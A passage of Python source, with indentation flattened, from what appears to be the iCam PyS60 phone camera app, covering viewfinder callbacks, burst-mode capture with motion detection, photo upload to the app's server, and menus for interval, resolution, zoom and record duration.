# actionChosen = rLearningCtrl.ReactToSystemUpdate()
rLearningCtrl.ReactToSystemUpdate(mdpEpoch)
except:
DebugPrintErrorTrace()
def ViewFinderCallbackS60Record(crtTime):
global videoRecordStartTime, videoRecordTime
global numFrames, videoRecordFPS
global posTimeForViewFinder
try:
if (S60_EDITION[0] >= 3) and (videoRecordStartTime != -1) and \
(numFrames % videoRecordFPS == 0):
# appuifw.app.body.text((110, 270), u"%.2f" % videoRecordTime,
# font = "title", fill = 0)
appuifw.app.body.text(posTimeForViewFinder, u"%02d:%02d" % \
(int(videoRecordTime) / 60, int(videoRecordTime) % 60), \
font="title", fill=0)
# appuifw.app.body.text(posTimeForViewFinder, u"%02d" \
# % int(videoRecordTime), font = "title", fill = 0)
"""
DebugPrint("ViewFinderCallback(): videoRecordTime = %f" % \
videoRecordTime)
"""
videoRecordTime = crtTime - videoRecordStartTime
appuifw.app.body.text(posTimeForViewFinder, u"%02d:%02d" % \
(int(videoRecordTime) / 60, int(videoRecordTime) % 60), \
font="title", fill=0xFF0000)
"""
appuifw.app.body.text(posTimeForViewFinder,
u"%d" % int(videoRecordTime),
font = "title", fill = 0xFF0000)
"""
except:
DebugPrintErrorTrace()
def ViewFinderCallbackS60InfoAndLearning(crtTime):
global numFrames
global lastTimeAdapted, numFramesLastTimeAdapted
global viewFinderStartTime, avgFPS
global posTimeForViewFinder
try:
if lastTimeAdapted < 0:
lastTimeAdapted = crtTime
# and (cameraMode[0] == 2) and (numFrames > 0)
"""
Note that S60 2nd edition has GetTime() with resolution of 1
second (not milliseconds, as in S60 3rd ed).
"""
if burstModeIsStarted:
if RLearningControllerIsImported:
if crtTime - lastTimeAdapted > 3.0:
"""
We put this before Adapt() because Adapt() changes
mdp.instantFPS.
"""
appuifw.app.body.text(posTimeForViewFinder,
u"FPS = %.2f (%.2f,%d%%)" % \
(mdp.instantFPS, avgFPS, photoQuality),
font="title", fill=0)
Adapt(crtTime - lastTimeAdapted, numFrames - \
numFramesLastTimeAdapted)
numFramesLastTimeAdapted = numFrames
lastTimeAdapted = crtTime
# 0.1 to avoid Division by zero
avgFPS = numFrames / (GetTime() + 0.1 - viewFinderStartTime)
appuifw.app.body.text(posTimeForViewFinder,
u"FPS = %.2f (%.2f,%d)" % \
(mdp.instantFPS, avgFPS,
photoQuality), font="title",
fill=0xFF0000)
else:
appuifw.app.body.text(posTimeForViewFinder,
u"FPS = %.2f" % avgFPS, font="title",
fill=0)
# 0.1 to avoid Division by zero
avgFPS = numFrames / (GetTime() + 0.1 - viewFinderStartTime)
appuifw.app.body.text(posTimeForViewFinder,
u"FPS = %.2f" % avgFPS, font="title",
fill=0xFF0000)
except:
DebugPrintErrorTrace()
def CallAlarmPhone():
try:
if ALARM_PHONE_NUMBER != "":
DebugPrint("Motion detected --> calling " \
"at time %s." % time.asctime(GetCurrentDateTime()))
telephone.dial(unicode(ALARM_PHONE_NUMBER))
e32.ao_sleep(10)
telephone.hang_up()
# e32.ao_sleep(2)
"""
!!!!After the call, the iCam Window is minimized, but the
viewfinder is still active, even if not displayed.
Maximize it using the appswitch module.
# See http://discussion.forum.nokia.com/forum/showthread.php?214083-appswitch-module.
# Basically I should do:
import appswitch
appswitch.switch_to_fg(u"myapp")
print appswitch.switch_to_bg(u"Menu")
"""
except:
DebugPrintErrorTrace()
def ViewFinderCallbackS60BurstMode(crtTime, crtVFFrame):
#global phoneModel
global viewFinderSize
global prevVFFrame
global LOCAL_FOLDER_MEDIA_FILES, counterViewFinderCallback, \
storeLocallyMedia
global MULTITHREADED_PHOTO_BURST_MODE_UPLOAD
"""
DebugPrint("ViewFinderCallbackS60BurstMode(): prevVFFrame = %s, " \
"crtVFFrame.size = %s, viewFinderSize = %s, " \
"motionDetectionIsOn=%d." % \
(str(prevVFFrame), str(crtVFFrame.size), str(viewFinderSize),
motionDetectionIsOn))
"""
try:
"""
ViewFinderCallbackS60BurstMode(): prevVFFrame = None,
crtVFFrame.size = (320, 240), viewFinderSize = (320, 240),
motionDetectionIsOn=1.
"""
if crtVFFrame.size == viewFinderSize:
if (cameraMode[0] == 2) and (cameraMode[1] == 0):
cameraId = 0
elif (cameraMode[0] == 0) and (cameraMode[1] == 2):
cameraId = 1
"""
if (motionDetectionIsOn == False) and \
(counterViewFinderCallback == 0):
"""
if counterViewFinderCallback == 0:
if (HTTP_INTERNET_UPLOAD_FAST == False) and \
(MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False) and \
(MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 == False) and \
(MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 == False):
hasDownloadedNewCmd = DownloadCommands()
"""
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
appuifw.app.body.blit(crtVFFrame)
appuifw.app.body.end_redraw()
else:
appuifw.app.body.blit(crtVFFrame)
"""
appuifw.app.body.blit(crtVFFrame)
"""
DebugPrint("ViewFinderCallbackS60BurstMode(): prevVFFrame = %s, " \
"motionDetectionIsOn = %s" % \
(str(prevVFFrame), str(motionDetectionIsOn)))
"""
motionDetected = False
#if motionDetectionIsOn is True:
if motionDetectionIsOn:
if prevVFFrame is not None:
"""
DebugPrint("ViewFinderCallbackS60BurstMode(): again " \
"prevVFFrame = %s, " \
"motionDetectionIsOn = %s" % \
(str(prevVFFrame), str(motionDetectionIsOn)))
"""
if DetectMotion(prevVFFrame, crtVFFrame):
motionDetected = True
prevVFFrame = crtVFFrame
# Draw a red rectangle.
#crtVFFrame.rectangle([(5, 5), (35, 35)],
# 0xff0000)
#myCanvas = appuifw.Canvas()
#appuifw.app.body = myCanvas
global fillColorText
"""
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
appuifw.app.body.text((100, 175), u"MD",
font="title", fill=fillColorText)
appuifw.app.body.end_redraw()
else:
appuifw.app.body.text((100, 175), u"MD",
font="title", fill=fillColorText)
"""
appuifw.app.body.text((100, 175), u"MD", \
font="title", fill=fillColorText)
fillColorText -= 0x2000
#myCanvas.text((10, 175),
# u"A: %04d %04d %04d" % (mov["data_1"],
# mov["data_2"], mov["data_3"]),
# font="title", fill = 0xff0000)
if False:
CallAlarmPhone()
else:
prevVFFrame = crtVFFrame
"""
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
# Erase text.
appuifw.app.body.text((100, 175), u"MD",
font="title", fill=0xFFFFFF)
appuifw.app.body.end_redraw()
else:
# Erase text.
appuifw.app.body.text((100, 175), u"MD",
font="title", fill=0xFFFFFF)
"""
# Erase text.
appuifw.app.body.text((100, 175), u"MD", \
font="title", fill=0xFFFFFF)
else:
DebugPrint("ViewFinderCallbackS60BurstMode(): else branch " \
"prevVFFrame = %s, " \
"motionDetectionIsOn = %s" % \
(str(prevVFFrame), str(motionDetectionIsOn)))
prevVFFrame = crtVFFrame
# We consider the 1st frame to be relevant
motionDetected = True
# No store, no upload
if NoInternetConnection() and (storeLocallyMedia == 0) and \
(bluetoothMode != 2):
PetWatchdog()
else:
#pass
if (motionDetectionIsOn == False) or \
(motionDetectionIsOn and motionDetected):
photoFileName = \
GetCurrentDateTimeStringWithMilliseconds() + \
"_%d.jpg" % cameraId
"""
crtTime = GetCurrentDateTime()
#photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S",
# crtTime) + ("_%d.png" % cameraId)
crtTime2 = GetTime()
#See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S",
crtTime) + ("_%03d_%d.jpg" % (numMilliseconds,
cameraId))
"""
# if storeLocallyMedia == 0:
"""
We check
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False
because if
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == True,
then we upload photoPathFileName but since
there can be several threads simultaneously
uploading they have to save to different files.
"""
if (storeLocallyMedia == 0) and \
(MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False):
# Since we don't want to store the file, we
# save it in the RAM drive.
#photoPathFileName = "D:/iCamTemp.jpg"
photoPathFileName = LOCAL_FOLDER_TEMP + \
"/iCamTemp.jpg"
else:
photoPathFileName = \
LOCAL_FOLDER_MEDIA_FILES + "/" + \
photoFileName
# pic = graphics.Image.open(photoPathFileName)
"""
Requires backslashes, otherwise pic.save gives
exception:
"SymbianError: [Errno -28] KErrBadName"
"""
photoPathFileNameWithBackslashes = \
photoPathFileName.replace("/", "\\")
"""
From PyS60 2.0 manual:
save(filename[,callback=None, format=None,
quality=75, bpp=24, compression='default'])
Saves the image into the given file. The supported
formats are JPEG and PNG. If format is not
given or is set to None, the format is
determined based on the file name extension:
'.jpg' or '.jpeg' are interpreted to be in JPEG
format and '.png' to be in PNG format.
filename should be a full path name.
When saving in JPEG format, the quality argument
specifies the quality to be used and can range
from 1 to 100.
When saving in PNG format, the bpp argument
specifies how many bits per pixel the resulting
file should have, and compression specifies the
compression level to be used.
Valid values for bpp are:
1: Black and white, 1 bit per pixel
8: 256 gray shades, 8 bits per pixel
24: 16.7 million colors, 24 bits per pixel
Valid values for compression are:
'best': The highest possible compression ratio,
the slowest speed
'fast': The fastest possible saving, moderate
compression
'no': No compression, very large file size
'default': Default compression, a compromise
between file size and speed
If callback is given,the operation is asynchronous.
When the saving is complete, the callback is
called with the result code.
"""
"""
For Burst (Turbo) mode we do not resize - we just
save the photos in JPEG instead of PNG
(JPEG compresses fast and a lot when compared
to PNG).
Save the photo (as JPEG) with 75%?? quality
locally.
"""
crtVFFrame.save(photoPathFileNameWithBackslashes,
None, None, quality=photoQuality)
DebugPrint("ViewFinderCallback(): Saved %s at " \
"photoQuality = %d (free_ram = %d)." % \
(photoPathFileName, photoQuality,
GetFreeRAM()))
"""
DebugPrint("ViewFinderCallback(): Saved %s " \
"(free_ram = %d, GetTime() = %.3f," \
" time.clock() = %.3f)." % \
(photoPathFileName, GetFreeRAM(),
GetTime(), time.clock()))
"""
def UploadThread2(photoFileName, photoPathFileName):
"""
http://stackoverflow.com/questions/2576534/does-pythons-httplib-httpconnection-block
"Although you can do asynchronous requests, you
will have to make you entire program
async-friendly. Async does not magically
make your code non-blocking. It would be
much easier to do the request in another
thread or process if you don't want to
block your main loop."
"""
"""
We do not sleep to give time to the phone to
complete saving the video file, since the
save() returns when the file is really
saved.
"""
# e32.ao_sleep(2)
UploadStateAndFileAndStoreState(
deviceId, cameraId,
photoFileName, photoPathFileName,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE
)
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD:
if uploadMediaToPicasa or (useiCamServer == 2): # (useiCamServer > 0)
"""
Multithreaded version --> it tries to
paralelize as much as possible in
order to send as many photos as
possible (max the fps) to the server.
"""
"""
thread.start_new_thread(UploadThread2,
(photoFileName, photoPathFileName))
"""
MyThreadStart(UploadThread2, \
(photoFileName, photoPathFileName))
else:
if uploadMediaToPicasa or (useiCamServer == 2): # (useiCamServer > 0)
# Single-threaded version
res = UploadStateAndFileAndStoreState(
deviceId, cameraId,
photoFileName, photoPathFileName,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ == True
--> UploadStateAndFileAndStoreState()
gives os.unlink(photoPathFileName)
"""
if (storeLocallyMedia == 0) and \
(ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ == False):
"""
print "Since storeLocallyMedia == 0, " \
"I saved the photo on D: and " \
"now I erase it."
"""
# sys.stdout.flush()
try:
if SYMBIAN_OS:
#if pyS60VersionNumber > 14:
if _PyS60_1_9_OR_NEWER:
mediaUploadedLock.wait()
os.unlink(photoPathFileName)
except:
DebugPrintErrorTrace()
if counterViewFinderCallback == \
NUM_FRAMES_TO_UPDATE_VIEWFINDER_EVERY - 1:
counterViewFinderCallback = 0
else:
counterViewFinderCallback += 1
else:
DebugPrint("ViewFinderCallbackS60BurstMode(): not saving since " \
"crtVFFrame.size = %s." % str(crtVFFrame.size))
except:
DebugPrintErrorTrace()
def ViewFinderCallback(crtVFFrame):
global viewFinderSize
global posTimeForViewFinder
global numFrames
if SYMBIAN_OS:
try:
"""
We try to avoid the camera shutter closes on models like N95, N82
- this might happen for example if the Burst (Turbo) and Motion
Detection modes are on and there is no motion.
"""
e32.reset_inactivity()
"""
See http://kernel.symbian.org/wiki/Apps:Python_on_Symbian/07._Graphics_and_Multimedia
(from "I had to use begin_redraw / end_redraw in almost all
examples of this book that uses canvas to make them work
correctly.")
Less important:
http://www.symbian-freak.com/forum/viewtopic.php?f=32&t=41207&start=0 .
http://pys60.garage.maemo.org/doc/s60/node25.html#1342
(PyS60 2.0 doc??)
Question: Why is non-redraw drawing bad for performance?
* The window server caches drawing operations in the redraw
store. Delimiting drawing with begin_redraw()/end_redraw()
allows window server to efficiently manage drawing
operations.
If applications perform drawing operations outside
begin_redraw/end_redraw, window server cannot cull drawing
operations from its cache of drawing operations, because it
cannot know whether a set of drawing operations has been
superceded by a new set. In this scenario every frame of
drawing that is done on a non-redraw drawing window will become
slower and slower as it draws all the drawing operations for
the entire history of the window (well actually up until the
last begin_redraw/end_redraw for the whole window).
If an application performs begin_redraw/end_redraw, it tells the
window server that it can throw away any old drawing operations
it had for the area of the window specified in the redraw, thus
allowing for more optimal management of drawing operations.
Question: What are the changes required for redraw drawing?
* Applications should delimit their drawing with
begin_redraw()/end_redraw() - i.e. they should replace
non-redraw drawing with redraw drawing. Sometimes, this is
as straight forward as adding these calls to existing
rendering code. In other cases (where the application has
been drawing using "incremental updates" to the window, the
application drawing code would need to be reworked to
perform a full refresh of the area redrawn for the rect
provided in begin_redraw(rect).
"""
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
global startedReceivingFramesFromViewFinder
startedReceivingFramesFromViewFinder = True
"""
global viewFinderTimer, viewFinderTimerIsOn
if viewFinderTimerIsOn:
#viewFinderTimerIsOn = False
viewFinderTimer.cancel()
"""
# """
# newImage = graphics.Image.new(crtVFFrame.size, '1')
# newImage = graphics.Image.new(crtVFFrame.size)
"""
# See
# http://discussion.forum.nokia.com/forum/showthread.php?154420-How-to-get-pixel-colour-from-a-graphics-object :
for y in range(height):
for x in range(width):
"""
"""
width, height = crtVFFrame.size
for y in range(height / 2 - 10, height / 2 + 10):
for x in range(width / 2 - 20, width / 2 + 20):
r, g, b = crtVFFrame.getpixel( (x, y) )[0]
newRGB = (255 - r, 255 - g, 255 - b)
# From
# http://discussion.forum.nokia.com/forum/showthread.php?114751-Is-there-a-setpixel-for-image-objects
# (a bit also
# http://discussion.forum.nokia.com/forum/showthread.php?120004-How-to-access-pixel-array-of-image-captured-by-viewfinder)
#newImage.point( (x, y), newRGB )
#newImage.point( (x, y), newRGB )
crtVFFrame.point( (x, y), newRGB )
"""
crtTime = GetTime()
ViewFinderCallbackS60Record(crtTime)
ViewFinderCallbackS60InfoAndLearning(crtTime)
"""
DebugPrint("ViewFinderCallback(): numFrames = %d." % (numFrames))
"""
numFrames += 1
if burstModeIsStarted and ((cameraMode[0] == 2) or \
(cameraMode[1] == 2)):
ViewFinderCallbackS60BurstMode(crtTime, crtVFFrame)
else:
"""
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
appuifw.app.body.blit(crtVFFrame)
appuifw.app.body.end_redraw()
else:
appuifw.app.body.blit(crtVFFrame)
"""
"""
DebugPrint("ViewFinderCallback(): crtVFFrame.size = %s, " \
"viewFinderSize = %s" % \
(str(crtVFFrame.size), str(viewFinderSize)))
"""
appuifw.app.body.blit(crtVFFrame)
# """
#print crtVFFrame.getpixel( (0, 0) )
#sys.stdout.flush()
#appuifw.app.body.blit(newImage)
# This displays the viewfinder image:
#appuifw.app.body.blit(crtVFFrame)
if SYMBIAN_3:
appuifw.app.body.end_redraw()
except:
DebugPrintErrorTrace()
viewFinderStarted = False
def StopViewFinderForCameraCallable(reallyStopViewFinder=True):
global viewFinderStarted
global doNotDisplayRedrawInfo
DebugPrint("Entered StopViewFinderForCameraCallable().")
if SYMBIAN_OS:
"""
This check is here to prevent the user to hit "Stop Viewfinder" when
the phone records. I think this is a bit paranoid - I guess this
case is not easy to reach.
"""
if videoRecordStartTime != -1:
DebugPrint("StopViewFinderForCameraCallable(): " \
"videoRecordStartTime = %d, which means that it is " \
"video recording --> bailing out." % \
videoRecordStartTime)
return
viewFinderStarted = False
SetMenu()
if reallyStopViewFinder:
try:
camera.stop_finder()
"""
This means we just stopped the VGA camera viewfinder - this happens
for the S60 3rd edition phones, for ex.
"""
if appuifw.app.orientation == "portrait":
SetUIOrientation(0, True)
doNotDisplayRedrawInfo = False
except:
DebugPrintErrorTrace()
def StartViewFinderForCamera(cameraId, isBackLightOn, waitForVFFrames=False):
global deviceId, localPhotoResolution, viewFinderSize
global viewFinderStarted
global doNotDisplayRedrawInfo
if SYMBIAN_OS:
DebugPrint("Entered StartViewFinderForCamera(cameraId = %d, " \
"isBackLightOn = %d) at %s: viewFinderSize = %s." % \
(cameraId, isBackLightOn,
GetCurrentDateTimeStringNice(), str(viewFinderSize)))
if videoRecordStartTime != -1:
DebugPrint("StartViewFinderForCamera(): " \
"videoRecordStartTime = %d, which means that it is " \
"video recording --> bailing out." % \
videoRecordStartTime)
return
viewFinderStarted = True
SetMenu()
try:
camera.stop_finder()
"""
Inspired from
http://discussion.forum.nokia.com/forum/showthread.php?164123-n73-fullscreen-camera-odd-behaviour .
"""
# camera.release()
SetUIOrientation(cameraId, True)
if phoneModel != "SamsungSGH-G810":
"""
Inspired from
http://discussion.forum.nokia.com/forum/showthread.php?164123-n73-fullscreen-camera-odd-behaviour .
Reinitialize the camera to cope with the orientation change.
# camera._my_camera = camera._camera.Camera(cameraId)
# This is for camera2: camera.UseCamera(cameraId)
"""
GeneralUseCameraS60(cameraId)
# Erase the screen to only show the view finder on the screen.
ClearScreen()
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in StartViewFinderForCamera(%d) - " \
"details: photoMode = %s, free_ram = %d. %s." % \
(cameraId, photoModeStr[photoModeIndex[cameraId]][1],
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
"""
myText = "StartViewFinderForCamera(%d) returned an exception. " \
"Bailing out..." % cameraId
"""
DebugPrint(myText)
DebugPrintErrorTrace()
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
try:
DebugPrint("StartViewFinderForCamera(): calling " \
"camera.start_finder().")
"""
NOTE: For both cameraId 0 and 1, camera.start_finder can trigger a
call to RedrawHandler(), so in this case we make
doNotDisplayRedrawInfo = True and make it False only in
StopViewFinderForCameraCallable.
"""
doNotDisplayRedrawInfo = True
"""
start_finder(callable[, backlight_on=1,
size=main pane size ])
"""
camera.start_finder(ViewFinderCallback, isBackLightOn,
viewFinderSize)
global numFrames, viewFinderStartTime
numFrames = 0
if burstModeIsStarted and (cameraMode[0] == 2):
viewFinderStartTime = GetTime()
if waitForVFFrames:
"""
On N95 and N82 it takes 3-5 seconds for the ViewFinder to turn
on. We want to wait exactly what is needed to start the VF.
#global viewFinderTimer, viewFinderTimerIsOn
#viewFinderTimerIsOn = True
# It sometimes breaks the control flow - the app is no longer
# progressing.
#viewFinderTimer.after(15)
"""
# """
global startedReceivingFramesFromViewFinder
startedReceivingFramesFromViewFinder = False
while startedReceivingFramesFromViewFinder == False:
# pass
"""
It crashes sometimes the app, especially if doing this in
Burst (Turbo) mode.
"""
# e32.ao_sleep(1)
"""
It implements brute busy waiting, which does not allow to
execute even callbacks, etc. (To stop a long
time.sleep() I had to remove the mem card...).
To make it work I use ao_yield().
"""
time.sleep(0.5)
"""
Inspired from
http://developer.symbian.org/wiki/Apps:Python_on_Symbian/03._System_Information_and_Operations#Wait.2FSleep .
"""
e32.ao_yield()
"""
But even so, for Burst (Turbo) mode, only 1-2 frames are
received in ViewFinderCallback(), and nothing else.
- is it missing some important active tasks?
"""
# """
DebugPrint("StartViewFinderForCamera(): Finished " \
"StartViewFinderForCamera() at %s." % \
GetCurrentDateTimeStringNice())
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in StartViewFinderForCamera(%d) - details: " \
"photoMode = %s, free_ram = %d. %s." % \
(cameraId, photoModeStr[photoModeIndex[cameraId]][1],
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
"""
myText = "StartViewFinderForCamera(%d) returned an exception. " \
"Bailing out..." % cameraId
"""
DebugPrint(myText)
DebugPrintErrorTrace()
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
StartViewFinderForCameraCallable = lambda cameraId, isBackLightOn: \
lambda : StartViewFinderForCamera(cameraId, isBackLightOn, False)
"""
These functions set the capture time interval, the number of cameras used,
resolution, zoom and photo (JPEG) quality to the selected value.
"""
def SetPauseInterval_real(aPauseInterval):
global pauseIntervalStr, pauseInterval, MENU_SELECT_PREFIX
global reactiveLoopIsStarted, burstModeIsStarted
DebugPrint("SetPauseInterval_real(): pauseInterval = %d, " \
"aPauseInterval = %d, len(pauseIntervalStr) = %d." % \
(pauseInterval, aPauseInterval, len(pauseIntervalStr)))
pauseInterval = aPauseInterval
# SetMenu()
StoreState()
"""
# This might be the reason my app crashed.
UploadText("New photo interval: %d." % pauseInterval,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
"""
if WINDOWS_CE_OS_PYTHONCE:
StoreConfig_CamAutoCfg_WinCE()
if ANDROID_OS:
#!!!!TODO: implement properly for Android
pass
elif SYMBIAN_OS:
if pauseInterval == 0:
if (reactiveLoopIsStarted == True) and \
(cameraMode[0] * cameraMode[1] == 0) and \
(cameraMode[0] + cameraMode[1]) > 0:
SetRecordDuration(0, 0)
SetRecordDuration(1, 0)
SetRecordDuration(2, 0)
StartBurstMode()
else:
if burstModeIsStarted == True:
# if reactiveLoopIsStarted == True:
StopBurstMode()
ReactiveLoop()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aPauseInterval parameter.
"""
SetPauseInterval = lambda aPauseInterval: lambda : \
SetPauseInterval_real(aPauseInterval)
# This var is required as global.
pauseFormSaved = False
# Uses a Form
def PauseIntervalMenu(*args):
global pauseFormSaved
global pauseInterval
DebugPrint("PauseIntervalMenu(): pauseInterval = %d, " \
"len(pauseIntervalStr) = %d." % \
(pauseInterval, len(pauseIntervalStr)))
if ANDROID_OS:
try:
"""
res = int(DialogGetInput("Enter Pause Interval:", "[seconds]",
str(pauseInterval)))
"""
#res = DialogGetInput("Enter Pause Interval:", "[seconds]",
res = DialogGetInput(
"Enter Pause Interval:", "[seconds (0 = Burst mode)]",
str(pauseInterval))
DisplayNote("res = %s" % str(res), waitTime=1.0)
res = int(res)
SetPauseInterval(res)()
except:
# myDroid.makeToast("pauseInterval = %d." % str(pauseInterval))
DebugPrintErrorTrace()
elif SYMBIAN_OS:
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
"""
try:
appuifw.app.title = u"Pause Interval"
selectionListPI = []
for i in range(len(pauseIntervalStr)):
if pauseIntervalStr[i][1] == pauseInterval:
selectionListPI += [unicode(MENU_SELECT_PREFIX
+ pauseIntervalStr[i][0])]
else:
selectionListPI += \
[unicode(pauseIntervalStr[i][0])]
# As the UX team noticed, on touch devices, to select you need to
# double tap (1 tap for focus, another for select).
index = appuifw.selection_list(selectionListPI, 1)
if index is not None:
# pauseInterval = pauseIntervalStr[index][1]
SetPauseInterval(pauseIntervalStr[index][1])()
except:
DebugPrintErrorTrace()
"""
try:
# Initialize a boolean variable to know whether the form is saved
pauseFormSaved = False
# Create a list to be used in "combo" selection mode.
piComboList = []
for piStr in pauseIntervalStr:
piComboList += [u"%s" % piStr[0]]
piIndex = 0
for i in range(len(pauseIntervalStr)):
if pauseIntervalStr[i][1] == pauseInterval:
piIndex = i
myFields = [(u"Pause Interval", "combo", (piComboList,
piIndex))] # (u"", "text", u"Pause Interval"),
appuifw.app.title = u"Pause Interval"
# Creates the form.
"""
pauseForm = appuifw.Form(myFields,
flags=appuifw.FFormEditModeOnly)
"""
pauseForm = appuifw.Form(myFields,
flags=appuifw.FFormEditModeOnly |
appuifw.FFormDoubleSpaced)
# pauseForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
# Define a function to be called when the form is saved.
def PauseFormSaved(arg):
global pauseFormSaved
pauseFormSaved = True
return True
# Assign the save function
pauseForm.save_hook = PauseFormSaved
# Show the form.This operation is blocking until we close the form.
pauseForm.execute()
# After the form is saved and closed, display the information.
if pauseFormSaved == True:
#print pauseForm[0][2]
#appuifw.note(unicode("Google Username: " +
# pauseForm[0][2]), "info")
"""
The combo form field value is a long integer. We convert it to
int because we would receive
"TypeError: Form combo field, bad index" at the next
instantiation of appuifw.Form().
"""
myIndex = int(pauseForm[0][2][1])
SetPauseInterval(pauseIntervalStr[myIndex][1])()
StoreState()
except:
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
def SetUploadedPhotoResolutionIndex_real(aResolutionIndex):
global photoResolutionStr, photoResolutionIndex, MENU_SELECT_PREFIX
DebugPrint("SetUploadedPhotoResolutionIndex_real(): " \
"aResolutionIndex = %d." % aResolutionIndex)
if (aResolutionIndex < 0) or (aResolutionIndex >= len(photoResolutionStr)):
return
"""
if photoResolutionStr[photoResolutionIndex][0][0:len(MENU_SELECT_PREFIX)]\
== MENU_SELECT_PREFIX:
photoResolutionStr[photoResolutionIndex][0] = \
photoResolutionStr[photoResolutionIndex][0][len(MENU_SELECT_PREFIX):]
photoResolutionStr[aResolutionIndex][0] = MENU_SELECT_PREFIX + \
photoResolutionStr[aResolutionIndex][0]
"""
photoResolutionIndex = aResolutionIndex
"""
global viewFinderSize
viewFinderSize = photoResolutionStr[photoResolutionIndex][1]
"""
# SetMenu()
StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aResolutionIndex parameter.
"""
SetUploadedPhotoResolutionIndex = lambda aResolutionIndex: lambda : \
SetUploadedPhotoResolutionIndex_real(aResolutionIndex)
def SetLocalPhotoResolutionIndex(aLocalPhotoResolutionIndex):
global localPhotoResolutionIndex, cameraPhotoSizes_JPEG_Exif, \
MENU_SELECT_PREFIX
DebugPrint("SetLocalPhotoResolutionIndex_real(): " \
"aLocalPhotoResolutionIndex = %d." % aLocalPhotoResolutionIndex)
if aLocalPhotoResolutionIndex < 0 or \
aLocalPhotoResolutionIndex >= len(cameraPhotoSizes_JPEG_Exif[0]):
return
localPhotoResolutionIndex[0] = aLocalPhotoResolutionIndex
DebugPrint("SetLocalPhotoResolutionIndex_real(): made " \
"localPhotoResolutionIndex[0] = %d." % \
aLocalPhotoResolutionIndex)
# SetMenu()
StoreState()
SetLocalPhotoResolution()
def SetDigitalZoom_real(aDigitalZoom):
global digitalZoom
DebugPrint("SetDigitalZoom_real(): aDigitalZoom = %d." % aDigitalZoom)
if ANDROID_OS:
pass
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
if (aDigitalZoom < 0) or (aDigitalZoom >= camera.max_zoom()):
return
digitalZoom = aDigitalZoom
# StartViewFinderForCamera(0, True, True)
# SetMenu()
StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aDigitalZoom parameter.
"""
SetDigitalZoom = lambda aDigitalZoom: lambda : \
SetDigitalZoom_real(aDigitalZoom)
# If cameraId == 2 then it means audioRecordDuration.
def SetRecordDuration(cameraId, aRecordDuration):
global videoRecordDuration, audioRecordDuration
DebugPrint("SetRecordDuration(): cameraId = %d, aRecordDuration = %d." % \
(cameraId, aRecordDuration))
if aRecordDuration < 0:
return
if cameraId == 0 or cameraId == 1:
videoRecordDuration[cameraId] = aRecordDuration
if WINDOWS_CE_OS_PYTHONCE:
StoreConfig_CamAutoCfg_WinCE()
elif cameraId == 2:
audioRecordDuration = aRecordDuration
StoreState()
cameraStr = ["Main", "VGA"]
# If cameraId == 2 then it means audioRecordDuration.
def SetRecordDurationMenu_real(cameraId):
global videoRecordDuration, audioRecordDuration
DebugPrint("Entered SetRecordDurationMenu_real(cameraId = %d)." % cameraId)
if cameraId == 0 or cameraId == 1:
myText = "Video Record Duration (" + cameraStr[cameraId] + " Camera):"
initVal = videoRecordDuration[cameraId]
elif cameraId == 2:
myText = "Audio Record Duration:"
initVal = audioRecordDuration
if ANDROID_OS:
try:
# res = int(DialogGetInput(myText, "[seconds]", str(initVal)))
res = DialogGetInput(myText, "[seconds]", str(initVal))
DisplayNote("res = %s" % str(res), waitTime=1.0)
res = int(res)
except:
# return
DebugPrint("Exception in SetRecordDurationMenu_real(). " \
"Bailing out...")
DebugPrintErrorTrace()
return
elif SYMBIAN_OS:
try:
resStr = appuifw.query(unicode(myText), "number", unicode(initVal))
if resStr is None:
return
res = int(resStr)
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
DebugPrint("Exception in SetRecordDurationMenu_real(). " \
"Bailing out...")
DebugPrintErrorTrace()
return
# SetMenu()
SetRecordDuration(cameraId, res)
StoreState()
SetRecordDurationMenu = lambda cameraId: lambda : \
SetRecordDurationMenu_real(cameraId)
# This var is required as global.
durationFormSaved = False
recordConfigFormSaved = False
def RecordConfigMenu():
global recordConfigFormSaved
global audioRecordDuration, videoRecordDuration, videoAudioEnabled
global localVideoModeIndex, localVideoMode
"""
